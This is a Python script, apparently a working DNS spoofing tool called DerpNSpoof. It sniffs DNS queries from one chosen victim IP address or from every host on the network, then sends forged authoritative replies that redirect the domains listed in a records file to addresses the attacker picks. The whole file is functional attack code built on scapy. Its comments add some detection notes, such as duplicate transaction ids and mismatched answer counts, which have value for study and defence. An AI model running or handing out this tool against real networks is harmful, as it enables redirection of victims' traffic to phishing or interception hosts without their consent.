#!/usr/bin/python3
# -*- coding: utf-8 -*-
#coded by: @adrianfa5
import os
import sys
import re
import socket
# ANSI SGR escape sequences used to colour console output, keyed by role.
# Every value has the form ESC[<code>m; 'ENDC' (code 0) resets all attributes.
# Several roles share a code on purpose (OKYELLOW/WARNING, RED/FAIL).
colors = {
    name: "\033[%dm" % code
    for name, code in (
        ('HEADER', 95),
        ('OKBLUE', 94),
        ('RED', 91),
        ('OKYELLOW', 93),
        ('GREEN', 92),
        ('LIGHTBLUE', 96),
        ('WARNING', 93),
        ('FAIL', 91),
        ('ENDC', 0),
        ('BOLD', 1),
        ('UNDERLINE', 4),
    )
}
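def menu():
    """Print the ASCII-art banner followed by the command-line usage help.

    Output goes to stdout and is wrapped in the ANSI sequences from the
    module-level ``colors`` table. Nothing is returned.
    """
    warn = colors['WARNING']
    info = colors['LIGHTBLUE']
    reset = colors['ENDC']

    # The backslash in the second row is written as "\\": the original "\ "
    # is an invalid escape sequence, which recent Python versions warn about
    # at compile time. The printed text is unchanged.
    banner_rows = (
        " ____ _____ _____ ___ ",
        "| \\ ___ ___ ___ | | || __| ___ ___ ___ | _|",
        "| | || -_|| _|| . || | | ||__ || . || . || . || _| ",
        "|____/ |___||_| | _||_|___||_____|| _||___||___||_| ",
        " |_| |_| ",
    )
    for row in banner_rows:
        print(warn + row + reset)
    print(colors['GREEN'] + " Coded by Adrián Fernández Arnal-(@adrianfa5)" + reset)
    print()

    separator = " --------------------------------------"
    help_rows = (
        " [!] Options to use:",
        " <ip> - Spoof the DNS query packets of a certain IP address",
        " <all> - Spoof the DNS query packets of all hosts",
        " [!] Examples:",
        " # python3 DerpNSpoof.py 192.168.1.20 myfile.txt",
        " # python3 DerpNSpoof.py all myfile.txt",
    )
    print(separator)
    for row in help_rows:
        print(info + row + reset)
    print(separator)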
# Show the banner and usage text as soon as the module is loaded; this runs
# before the command-line arguments are inspected further down.
menu()
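def valid_ip(address):
    """Return True only when *address* is a strict dotted-quad IPv4 string.

    ``socket.inet_pton`` is used instead of ``socket.inet_aton`` because
    ``inet_aton`` also accepts shorthand forms such as ``"127.1"``. The rest
    of this file compares addresses as plain strings against packet source
    addresses, so a shorthand value would pass validation and then never
    match anything.

    Non-string input (for example ``None``) yields False rather than raising.
    Only the errors the conversion can raise are caught, so KeyboardInterrupt
    and SystemExit propagate instead of being reported as "invalid address".
    """
    try:
        socket.inet_pton(socket.AF_INET, address)
    except (OSError, TypeError, ValueError):
        return False
    return True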
def check_local_ip():
    """Return this host's IPv4 address, prompting the operator if detection fails.

    The address is later used to skip packets that originate from this
    machine. Detection runs a fixed shell pipeline; no caller-supplied text
    is interpolated into the command.
    """
    # Takes the ninth whitespace-separated field of every `ip route` line that
    # contains "src" -- presumably the address after the `src` keyword, but
    # that depends on the route line layout (TODO confirm). Several matching
    # lines yield a multi-line string, which fails validation below and falls
    # through to the prompt.
    candidate = os.popen("ip route | grep 'src' | awk {'print $9'}").read().strip()
    while not valid_ip(candidate):
        candidate = input(colors['WARNING']+" [!] Cannot get your local IP addres, please write it: "+colors['ENDC']).strip()
    return candidate
# Resolved at load time, before the argument count is checked, so the
# interactive fallback prompt can appear even when the usage is wrong.
local_ip = check_local_ip()

# Exactly two positional arguments are required: the target selector
# (an IPv4 address or the literal "all") and the records file path.
if len(sys.argv) != 3:
    print (' [i] Usage <victim_ip> <records_file>')
    sys.exit(1)

victim_ip, path = sys.argv[1], sys.argv[2]
# Capture filter handed to sniff(): UDP datagrams addressed to port 53 only.
sniff_filter = 'udp dst port 53'
# domain -> substitute address table, filled by read_file().
registers = {}
def valid_args():
    """Validate the target selector and report whether it is the wildcard.

    Returns:
        False when ``victim_ip`` is a valid IPv4 address, True when it is the
        literal string ``'all'``.

    Any other value prints an error and terminates the process with status 1.
    """
    if valid_ip(victim_ip):
        return False
    if victim_ip != 'all':
        print (colors['FAIL']+' [!] Invalid victim\'s IP address'+colors['ENDC'])
        sys.exit(1)
    return True
# True when every host is in scope ("all"), False for a single address.
all_pkt = valid_args()
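def read_file(path):
    """Load the records file into the module-level ``registers`` dict.

    Every non-blank line must hold exactly two whitespace-separated fields,
    ``<domain> <fake_address>``. The address is validated with ``valid_ip``
    before the pair is stored.

    The process exits with status 1 when the file is missing or empty, when a
    line does not have exactly two fields, or when an address is invalid.
    """
    if not (os.path.isfile(path) and os.stat(path).st_size > 0):
        print(colors['FAIL']+" [!] The file doesn't exists or is empty"+colors['ENDC'])
        sys.exit(1)

    # The context manager closes the file on every path, including sys.exit().
    with open(path, "r") as records:
        for line in records:
            if line in ('\n', '\r\n'):
                continue
            # Only the unpacking can fail here. Catching ValueError alone keeps
            # the SystemExit raised for a bad address from being intercepted,
            # which previously printed a second, misleading "invalid format"
            # message after the "invalid IP" one.
            try:
                key, value = line.split()
            except ValueError:
                print(colors['FAIL']+" [!] Invalid file format: <domain> <fake_address>"+colors['ENDC'])
                sys.exit(1)
            if not valid_ip(value):
                print(colors['WARNING']+" [!] Detected an invalid IP address in the file ["+value+"]"+colors['ENDC'])
                sys.exit(1)
            # Store only after validation so the table never holds a bad entry.
            registers[key] = value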
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def check_victims(pkt):
    """Tell whether a captured packet comes from a host that is in scope.

    Returns False for packets without an IP layer. Otherwise returns True when
    the wildcard mode (``all_pkt``) is on, or the result of comparing the
    packet's source address with ``victim_ip`` as plain strings.
    """
    if IP not in pkt:
        return False
    if all_pkt:
        return True
    return pkt[IP].src == victim_ip
def fake_dns_response(pkt):
    """Per-packet callback: answer an in-scope DNS query with a forged response.

    A reply is sent only when every check below passes, in this order: the
    sender is in scope (``check_victims``), the packet did not come from this
    host, it carries UDP and DNS layers, it is a standard query (opcode 0)
    with no answers, and the queried name is a key of ``registers``.

    The reply swaps the query's IP addresses and UDP ports, copies the DNS
    transaction id and question section, and sets ``qr=1`` and ``aa=1``.

    Detection notes: nothing here suppresses the genuine resolver's answer, so
    a client typically receives two responses carrying the same transaction id
    but different data. DNSSEC validation, or an encrypted resolver transport,
    keeps such an answer from being accepted.
    NOTE(review): ``ancount`` is declared as 1 while two identical DNSRR
    records are chained into ``an``; that mismatch looks like a recognisable
    trait of this traffic -- confirm against a capture.
    """
    if not check_victims(pkt):
        return
    if pkt[IP].src == local_ip:
        return
    if UDP not in pkt or DNS not in pkt:
        return
    if pkt[DNS].opcode != 0 or pkt[DNS].ancount != 0:
        return

    # str() of the qname is sliced to drop its first two and last two
    # characters -- presumably the b' prefix and the trailing .' of a bytes
    # repr such as b'example.com.' (TODO confirm the qname type).
    qname_text = str(pkt[DNSQR].qname)
    cap_domain = qname_text[2:len(qname_text) - 2]
    if cap_domain not in registers:
        return

    substitute = registers[cap_domain]
    ip_layer = IP(dst=pkt[IP].src, src=pkt[IP].dst)
    udp_layer = UDP(dport=pkt[UDP].sport, sport=53)
    answers = DNSRR(rrname=pkt[DNSQR].qname, rdata=substitute) / DNSRR(rrname=pkt[DNSQR].qname, rdata=substitute)
    dns_layer = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, qr=1, ancount=1, an=answers)
    fakeResponse = ip_layer / udp_layer / dns_layer
    send(fakeResponse, verbose=0)

    print(
        colors['GREEN']+" [#] Spoofed response sent to "+colors['ENDC']+"["+pkt[IP].src+"]"
        +colors['WARNING']+": Redirecting "+colors['ENDC']+"["+cap_domain+"]"
        +colors['WARNING']+" to "+colors['ENDC']+"["+registers[cap_domain]+"]"
    )
def main():
    """Load the records table, then hand every captured DNS query to the callback.

    ``sniff`` is called with the module-level capture filter and ``store=0``,
    so captured packets are passed to ``fake_dns_response`` and not retained.
    """
    read_file(path)
    print(' [i] Spoofing DNS responses...')
    sniff(filter=sniff_filter, prn=fake_dns_response, store=0)
# Start capturing only when run as a script. The banner, local-address lookup
# and argument checks above are module-level code and run on import as well.
if __name__ == "__main__":
    main()